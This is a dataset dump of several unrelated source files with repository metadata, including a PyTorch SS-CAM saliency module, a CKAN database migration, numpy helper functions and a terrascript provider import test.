| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97b9fcb9b87594b5cd601955cd193fd8e0ac892f
| 6,846
|
py
|
Python
|
deeppixel/cam/sscam.py
|
ls-da3m0ns/DeepPixel
|
1739502363a1fae6fb8c5c502bfdb018e585c6f7
|
[
"MIT"
] | null | null | null |
deeppixel/cam/sscam.py
|
ls-da3m0ns/DeepPixel
|
1739502363a1fae6fb8c5c502bfdb018e585c6f7
|
[
"MIT"
] | 3
|
2021-09-08T03:07:00.000Z
|
2022-03-12T00:56:04.000Z
|
deeppixel/cam/sscam.py
|
ls-da3m0ns/DeepPixel
|
1739502363a1fae6fb8c5c502bfdb018e585c6f7
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn.functional as F
class SSCAM1(BaseCAM):
"""
SSCAM1, inherit from BaseCAM
"""
def __init__(self, model_dict):
super().__init__(model_dict)
def forward(self, input, class_idx=None, param_n=35, mean=0, sigma=2, retain_graph=False):
b, c, h, w = input.size()
# prediction on raw input
logit = self.model_arch(input)
if class_idx is None:
predicted_class = logit.max(1)[-1]
score = logit[:, logit.max(1)[-1]].squeeze()
else:
predicted_class = torch.LongTensor([class_idx])
score = logit[:, class_idx].squeeze()
logit = F.softmax(logit)
if torch.cuda.is_available():
predicted_class= predicted_class.cuda()
score = score.cuda()
logit = logit.cuda()
self.model_arch.zero_grad()
score.backward(retain_graph=retain_graph)
activations = self.activations['value']
b1, k, u, v = activations.size()
score_saliency_map = torch.zeros((1, 1, h, w))
if torch.cuda.is_available():
activations = activations.cuda()
score_saliency_map = score_saliency_map.cuda()
#HYPERPARAMETERS (can be modified for better/faster explanations)
#mean = 0
#param_n = 35
#param_sigma_multiplier = 2
with torch.no_grad():
for i in range(k):
# upsampling
saliency_map = torch.unsqueeze(activations[:, i, :, :], 1)
saliency_map = F.interpolate(saliency_map, size=(h, w), mode='bilinear', align_corners=False)
if saliency_map.max() == saliency_map.min():
continue
x = saliency_map
if (torch.max(x) - torch.min(x)).item() == 0:
continue
else:
sigma = param_sigma_multiplier / (torch.max(x) - torch.min(x)).item()
score_list = []
noisy_list = []
# Adding noise to the upsampled activation map `x`
for _ in range(param_n):
noise = Variable(x.data.new(x.size()).normal_(mean, sigma**2))
noisy_img = x + noise
noisy_list.append(noisy_img)
output = self.model_arch(noisy_img * input)
output = F.softmax(output)
score = output[0][predicted_class]
score_list.append(score)
# Averaging the scores to introduce smoothing
score = sum(score_list) / len(score_list)
score_saliency_map += score * saliency_map
score_saliency_map = F.relu(score_saliency_map)
score_saliency_map_min, score_saliency_map_max = score_saliency_map.min(), score_saliency_map.max()
if score_saliency_map_min == score_saliency_map_max:
return None
score_saliency_map = (score_saliency_map - score_saliency_map_min).div(score_saliency_map_max - score_saliency_map_min).data
return score_saliency_map
def __call__(self, input, class_idx=None, retain_graph=False):
return self.forward(input, class_idx, retain_graph)
class SSCAM2(BaseCAM):
"""
SSCAM2, inherit from BaseCAM
"""
def __init__(self, model_dict):
super().__init__(model_dict)
def forward(self, input, class_idx=None, param_n=35, mean=0, sigma=2, retain_graph=False):
b, c, h, w = input.size()
# prediction on raw input
logit = self.model_arch(input)
if class_idx is None:
predicted_class = logit.max(1)[-1]
score = logit[:, logit.max(1)[-1]].squeeze()
else:
predicted_class = torch.LongTensor([class_idx])
score = logit[:, class_idx].squeeze()
logit = F.softmax(logit)
if torch.cuda.is_available():
predicted_class= predicted_class.cuda()
score = score.cuda()
logit = logit.cuda()
self.model_arch.zero_grad()
score.backward(retain_graph=retain_graph)
activations = self.activations['value']
b1, k, u, v = activations.size()
score_saliency_map = torch.zeros((1, 1, h, w))
if torch.cuda.is_available():
activations = activations.cuda()
score_saliency_map = score_saliency_map.cuda()
#HYPERPARAMETERS (can be modified for better/faster explanations)
#mean = 0
#param_n = 35
#param_sigma_multiplier = 2
with torch.no_grad():
for i in range(k):
# upsampling
saliency_map = torch.unsqueeze(activations[:, i, :, :], 1)
saliency_map = F.interpolate(saliency_map, size=(h, w), mode='bilinear', align_corners=False)
if saliency_map.max() == saliency_map.min():
continue
# Normalization
norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())
x = input * norm_saliency_map
if (torch.max(x) - torch.min(x)).item() == 0:
continue
else:
sigma = param_sigma_multiplier / (torch.max(x) - torch.min(x)).item()
score_list = []
noisy_list = []
# Adding noise to the normalized input mask `x`
for i in range(param_n):
noise = Variable(x.data.new(x.size()).normal_(mean, sigma**2))
noisy_img = x + noise
noisy_list.append(noisy_img)
noisy_img = noisy_img.cuda()
output = self.model_arch(noisy_img)
output = F.softmax(output)
score = output[0][predicted_class]
score_list.append(score)
# Averaging the scores to introduce smoothing
score = sum(score_list) / len(score_list)
score_saliency_map += score * saliency_map
score_saliency_map = F.relu(score_saliency_map)
score_saliency_map_min, score_saliency_map_max = score_saliency_map.min(), score_saliency_map.max()
if score_saliency_map_min == score_saliency_map_max:
return None
score_saliency_map = (score_saliency_map - score_saliency_map_min).div(score_saliency_map_max - score_saliency_map_min).data
return score_saliency_map
def __call__(self, input, class_idx=None, retain_graph=False):
return self.forward(input, class_idx, retain_graph)
| 33.558824
| 132
| 0.560327
| 784
| 6,846
| 4.612245
| 0.153061
| 0.167312
| 0.168142
| 0.06969
| 0.938053
| 0.938053
| 0.915376
| 0.915376
| 0.915376
| 0.915376
| 0
| 0.009292
| 0.33976
| 6,846
| 204
| 133
| 33.558824
| 0.790708
| 0.079609
| 0
| 0.896552
| 0
| 0
| 0.004173
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0
| 0.017241
| 0.017241
| 0.137931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ade034bb4e3c7ebaad6977b29ae5cc454ba85a7
| 109
|
py
|
Python
|
src/spyd/game/command/commands/__init__.py
|
DanSeraf/spyd
|
af893b7f9c67785613b25754eb2cf150523a9fe4
|
[
"Zlib"
] | 4
|
2015-05-05T16:44:42.000Z
|
2020-10-27T09:45:23.000Z
|
src/spyd/game/command/commands/__init__.py
|
DanSeraf/spyd
|
af893b7f9c67785613b25754eb2cf150523a9fe4
|
[
"Zlib"
] | null | null | null |
src/spyd/game/command/commands/__init__.py
|
DanSeraf/spyd
|
af893b7f9c67785613b25754eb2cf150523a9fe4
|
[
"Zlib"
] | 2
|
2016-12-13T22:21:08.000Z
|
2020-03-14T16:44:20.000Z
|
from spyd.utils.import_all import import_all
import_all(__file__, 'spyd.game.command.commands', ['__init__'])
| 54.5
| 64
| 0.807339
| 16
| 109
| 4.8125
| 0.625
| 0.350649
| 0.38961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055046
| 109
| 2
| 64
| 54.5
| 0.747573
| 0
| 0
| 0
| 0
| 0
| 0.309091
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c10f5f17c7a6be734760e4d0f28cbe1e4b1c7f22
| 16,108
|
py
|
Python
|
ckan/migration/versions/039_add_expired_id_and_dates.py
|
okfde/ckankrzn
|
df4c1ed624f6751ac2a8f03527ff19e448d27dfb
|
[
"Apache-2.0"
] | 4
|
2017-06-12T15:18:30.000Z
|
2019-10-11T15:12:43.000Z
|
ckan/migration/versions/039_add_expired_id_and_dates.py
|
okfde/ckankrzn
|
df4c1ed624f6751ac2a8f03527ff19e448d27dfb
|
[
"Apache-2.0"
] | 64
|
2017-05-14T22:15:53.000Z
|
2020-03-08T15:26:49.000Z
|
ckan/migration/versions/039_add_expired_id_and_dates.py
|
okfde/ckankrzn
|
df4c1ed624f6751ac2a8f03527ff19e448d27dfb
|
[
"Apache-2.0"
] | 5
|
2017-04-06T21:18:38.000Z
|
2020-03-30T17:05:23.000Z
|
# encoding: utf-8
from migrate import *
import uuid
import datetime
def upgrade(migrate_engine):
id = uuid.uuid4()
make_missing_revisions = '''
-- make sure all tables have an entry in the revision_table
insert into revision values ('%(id)s' , '%(timestamp)s', 'admin', 'Admin: make sure every object has a row in a revision table', 'active');
insert into package_tag_revision (id,package_id,tag_id,revision_id,state,continuity_id) select id,package_id,tag_id, '%(id)s' ,state, id from package_tag where package_tag.id not in (select id from package_tag_revision);
insert into resource_revision (id,resource_group_id,url,format,description,position,revision_id,hash,state,extras,continuity_id) select id,resource_group_id,url,format,description,position, '%(id)s' ,hash,state,extras, id from resource where resource.id not in (select id from resource_revision);
insert into group_extra_revision (id,group_id,key,value,state,revision_id,continuity_id) select id,group_id,key,value,state, '%(id)s' , id from group_extra where group_extra.id not in (select id from group_extra_revision);
insert into resource_group_revision (id,package_id,label,sort_order,extras,state,revision_id,continuity_id) select id,package_id,label,sort_order,extras,state, '%(id)s', id from resource_group where resource_group.id not in (select id from resource_group_revision);
insert into package_extra_revision (id,package_id,key,value,revision_id,state,continuity_id) select id,package_id,key,value, '%(id)s',state, id from package_extra where package_extra.id not in (select id from package_extra_revision);
insert into package_relationship_revision (id,subject_package_id,object_package_id,type,comment,revision_id,state,continuity_id) select id,subject_package_id,object_package_id,type,comment, '%(id)s',state, id from package_relationship where package_relationship.id not in (select id from package_relationship_revision);
insert into group_revision (id,name,title,description,created,state,revision_id,continuity_id) select id,name,title,description,created,state, '%(id)s', id from "group" where "group".id not in (select id from group_revision);
insert into package_revision (id,name,title,url,notes,license_id,revision_id,version,author,author_email,maintainer,maintainer_email,state,continuity_id) select id,name,title,url,notes,license_id, '%(id)s',version,author,author_email,maintainer,maintainer_email,state, id from package where package.id not in (select id from package_revision);
''' % dict(id=id, timestamp=datetime.datetime.utcnow().isoformat())
update_schema = '''
ALTER TABLE package_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_extra_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE group_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE group_extra_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_group_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_tag_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE resource_group_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE resource_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE package_relationship_revision
ADD COLUMN expired_id text,
ADD COLUMN revision_timestamp timestamp without time zone,
ADD COLUMN expired_timestamp timestamp without time zone,
ADD COLUMN current boolean;
ALTER TABLE revision
ADD COLUMN approved_timestamp timestamp without time zone;
create table tmp_expired_id(id text, revision_id text, revision_timestamp timestamp, expired_timestamp timestamp, expired_id text);
create index id_exp on tmp_expired_id(id, revision_id);
--package revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_revision pr join revision r on pr.revision_id = r.id;
update package_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_package_period on package_revision(revision_timestamp, expired_timestamp, id);
create index idx_package_current on package_revision(current);
--package extra revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_extra_revision pr join revision r on pr.revision_id = r.id;
update package_extra_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_extra_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_package_extra_period on package_extra_revision(revision_timestamp, expired_timestamp, id);
create index idx_package_extra_period_package on package_extra_revision(revision_timestamp, expired_timestamp, package_id);
create index idx_package_extra_current on package_extra_revision(current);
--package group revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_group_revision pr join revision r on pr.revision_id = r.id;
update package_group_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_group_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_package_group_period_package_group on package_group_revision(revision_timestamp, expired_timestamp, package_id, group_id);
create index idx_package_group_current on package_group_revision(current);
-- package_tags
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_tag_revision pr join revision r on pr.revision_id = r.id;
update package_tag_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_tag_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_period_package_tag on package_tag_revision(revision_timestamp, expired_timestamp, package_id, tag_id);
create index idx_package_tag_current on package_tag_revision(current);
-- package relationship
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from package_relationship_revision pr join revision r on pr.revision_id = r.id;
update package_relationship_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update package_relationship_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_period_package_relationship on package_relationship_revision(revision_timestamp, expired_timestamp, object_package_id, subject_package_id);
create index idx_package_relationship_current on package_relationship_revision(current);
-- resource revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from resource_revision pr join revision r on pr.revision_id = r.id;
update resource_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update resource_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_resource_period on resource_revision(revision_timestamp, expired_timestamp, id);
create index idx_resource_period_resource_group on resource_revision(revision_timestamp, expired_timestamp, resource_group_id);
create index idx_resource_current on resource_revision(current);
-- resource group revision;
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from resource_group_revision pr join revision r on pr.revision_id = r.id;
update resource_group_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update resource_group_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_resource_group_period on resource_group_revision(revision_timestamp, expired_timestamp, id);
create index idx_resource_group_period_package on resource_group_revision(revision_timestamp, expired_timestamp, package_id);
create index idx_resource_group_current on resource_group_revision(current);
--group revision;
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from group_revision pr join revision r on pr.revision_id = r.id;
update group_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update group_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_group_period on group_revision(revision_timestamp, expired_timestamp, id);
create index idx_group_current on group_revision(current);
--group extra revision
truncate tmp_expired_id;
insert into tmp_expired_id select pr.id, revision_id, timestamp, lead(timestamp, 1, '9999-12-31') over (partition by pr.id order by timestamp), lead(pr.revision_id) over (partition by pr.id order by timestamp) from group_extra_revision pr join revision r on pr.revision_id = r.id;
update group_extra_revision pr set revision_timestamp = (select revision_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_timestamp = (select expired_timestamp from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id),
expired_id = (select expired_id from tmp_expired_id tmp where tmp.revision_id = pr.revision_id and tmp.id = pr.id);
update group_extra_revision set current = '1' where expired_timestamp = '9999-12-31';
create index idx_group_extra_period on group_extra_revision(revision_timestamp, expired_timestamp, id);
create index idx_group_extra_period_group on group_extra_revision(revision_timestamp, expired_timestamp, group_id);
create index idx_group_extra_current on group_extra_revision(current);
drop table tmp_expired_id;
-- change state of revision tables
update revision set approved_timestamp = timestamp;
'''
migrate_engine.execute('begin; ' + make_missing_revisions + update_schema + ' commit;')
for table in ['package', 'resource', 'resource_group', 'package_extra',
'package_tag', 'package_relationship', 'group', 'group_extra']:
count = migrate_engine.execute('''select count(*) from "%s"''' % table).first()[0]
revision_expired_id_count = migrate_engine.execute('''select count(*) from %s_revision where %s_revision.expired_id is null''' % (table, table)).first()[0]
revision_expired_data_count = migrate_engine.execute('''select count(*) from %s_revision where %s_revision.expired_timestamp = '9999-12-31' ''' % (table, table)).first()[0]
revision_current = migrate_engine.execute('''select count(*) from %s_revision where %s_revision.current = '1' ''' % (table, table)).first()[0]
assert count == revision_expired_id_count
assert count == revision_expired_data_count
assert count == revision_current
| 72.558559
| 343
| 0.779054
| 2,430
| 16,108
| 4.917284
| 0.051029
| 0.082852
| 0.048205
| 0.036154
| 0.833626
| 0.798393
| 0.768767
| 0.724914
| 0.685246
| 0.670516
| 0
| 0.012884
| 0.147132
| 16,108
| 221
| 344
| 72.886878
| 0.856893
| 0.000931
| 0
| 0.379518
| 0
| 0.271084
| 0.945
| 0.178858
| 0
| 0
| 0
| 0
| 0.018072
| 1
| 0.006024
| false
| 0
| 0.018072
| 0
| 0.024096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c12c3682cc8f6a00c43bdb0d4ed36012e031ebfa
| 195
|
py
|
Python
|
scripts/unet/create_exportable_tiles.py
|
SchiffFlieger/semantic-segmentation-master-thesis
|
f54b8321a9e0828e492bc6847acbff80c1a75d7c
|
[
"MIT"
] | 1
|
2021-02-07T09:22:44.000Z
|
2021-02-07T09:22:44.000Z
|
scripts/unet/create_exportable_tiles.py
|
SchiffFlieger/semantic-segmentation-master-thesis
|
f54b8321a9e0828e492bc6847acbff80c1a75d7c
|
[
"MIT"
] | null | null | null |
scripts/unet/create_exportable_tiles.py
|
SchiffFlieger/semantic-segmentation-master-thesis
|
f54b8321a9e0828e492bc6847acbff80c1a75d7c
|
[
"MIT"
] | null | null | null |
from scripts.common.create_exportable_tiles import create_exportable_tile_table
if __name__ == '__main__':
create_exportable_tile_table(table_suffix="unet", tile_size=57.2, label_size=38.8)
| 39
| 86
| 0.825641
| 29
| 195
| 4.896552
| 0.689655
| 0.338028
| 0.28169
| 0.352113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03352
| 0.082051
| 195
| 4
| 87
| 48.75
| 0.759777
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c149df1bc64642d9bb20ce42beff16098ea0ab62
| 599
|
py
|
Python
|
ue/ue_05/problem_1.py
|
VoxelPi/compm
|
745019d4e0d156910f19ed9168949f150356a349
|
[
"MIT"
] | null | null | null |
ue/ue_05/problem_1.py
|
VoxelPi/compm
|
745019d4e0d156910f19ed9168949f150356a349
|
[
"MIT"
] | 4
|
2022-03-09T22:54:25.000Z
|
2022-03-29T21:33:49.000Z
|
ue/ue_05/problem_1.py
|
VoxelPi/compm
|
745019d4e0d156910f19ed9168949f150356a349
|
[
"MIT"
] | null | null | null |
import numpy as np
def gendot(A, B):
(n, m) = A.shape
(p, q) = B.shape
assert(n*m == p*q)
return np.sum(np.reshape(A, (n*m, 1)) * np.reshape(B, (n*m, 1)))
A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
B = np.array([[1, 0, 1, 0, 1, 0], [1, 0, 1, 0, 1, 0]])
print(gendot(A, B))
def genadd(A, B):
(n, m) = A.shape
(p, q) = B.shape
assert(n*m == p*q)
return np.sum(np.reshape(A, (n*m, 1)) + np.reshape(B, (n*m, 1)))
A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
B = np.array([[1, 0, 1, 0, 1, 0], [1, 0, 1, 0, 1, 0]])
print(genadd(A, B))
| 24.958333
| 68
| 0.459098
| 136
| 599
| 2.022059
| 0.242647
| 0.087273
| 0.109091
| 0.145455
| 0.821818
| 0.821818
| 0.821818
| 0.821818
| 0.821818
| 0.821818
| 0
| 0.128035
| 0.24374
| 599
| 23
| 69
| 26.043478
| 0.479029
| 0
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.294118
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c153a22d554e822c5dbca54ec199215395aae269
| 1,375
|
py
|
Python
|
tests/test_provider_kvrhdn_honeycombio.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_kvrhdn_honeycombio.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_kvrhdn_honeycombio.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_kvrhdn_honeycombio.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:18:50 UTC)
def test_provider_import():
import terrascript.provider.kvrhdn.honeycombio
def test_resource_import():
from terrascript.resource.kvrhdn.honeycombio import honeycombio_board
from terrascript.resource.kvrhdn.honeycombio import honeycombio_column
from terrascript.resource.kvrhdn.honeycombio import honeycombio_dataset
from terrascript.resource.kvrhdn.honeycombio import honeycombio_derived_column
from terrascript.resource.kvrhdn.honeycombio import honeycombio_marker
from terrascript.resource.kvrhdn.honeycombio import honeycombio_trigger
def test_datasource_import():
from terrascript.data.kvrhdn.honeycombio import honeycombio_datasets
from terrascript.data.kvrhdn.honeycombio import honeycombio_query
from terrascript.data.kvrhdn.honeycombio import honeycombio_trigger_recipient
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.kvrhdn.honeycombio
#
# t = terrascript.provider.kvrhdn.honeycombio.honeycombio()
# s = str(t)
#
# assert 'https://github.com/kvrhdn/terraform-provider-honeycombio' in s
# assert '0.1.4' in s
| 31.976744
| 82
| 0.796364
| 165
| 1,375
| 6.49697
| 0.406061
| 0.206157
| 0.193097
| 0.285448
| 0.569963
| 0.478545
| 0.478545
| 0.117537
| 0
| 0
| 0
| 0.012594
| 0.133818
| 1,375
| 42
| 83
| 32.738095
| 0.88749
| 0.371636
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0
| 1
| 0.230769
| true
| 0
| 1
| 0
| 1.230769
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
c16732dde5b8ea3623976694d640f5d74f445c76
| 105
|
py
|
Python
|
app/home/models/__init__.py
|
Monxun/monxun-code
|
35ce6d4aaf3a8afa0b80dde1dae9a1e7603a1f84
|
[
"MIT"
] | null | null | null |
app/home/models/__init__.py
|
Monxun/monxun-code
|
35ce6d4aaf3a8afa0b80dde1dae9a1e7603a1f84
|
[
"MIT"
] | null | null | null |
app/home/models/__init__.py
|
Monxun/monxun-code
|
35ce6d4aaf3a8afa0b80dde1dae9a1e7603a1f84
|
[
"MIT"
] | null | null | null |
from .home_models import *
from .biz_models import *
from .mus_models import *
from .vbt_models import *
| 21
| 26
| 0.771429
| 16
| 105
| 4.8125
| 0.4375
| 0.623377
| 0.623377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152381
| 105
| 4
| 27
| 26.25
| 0.865169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1790aa226329b81b657c1efacf09fa4c8764c4a
| 312
|
py
|
Python
|
python/ql/test/experimental/dataflow/ApiGraphs/test4.py
|
timoles/codeql
|
2d24387e9e300bf03be35694816b1e76ae88a50c
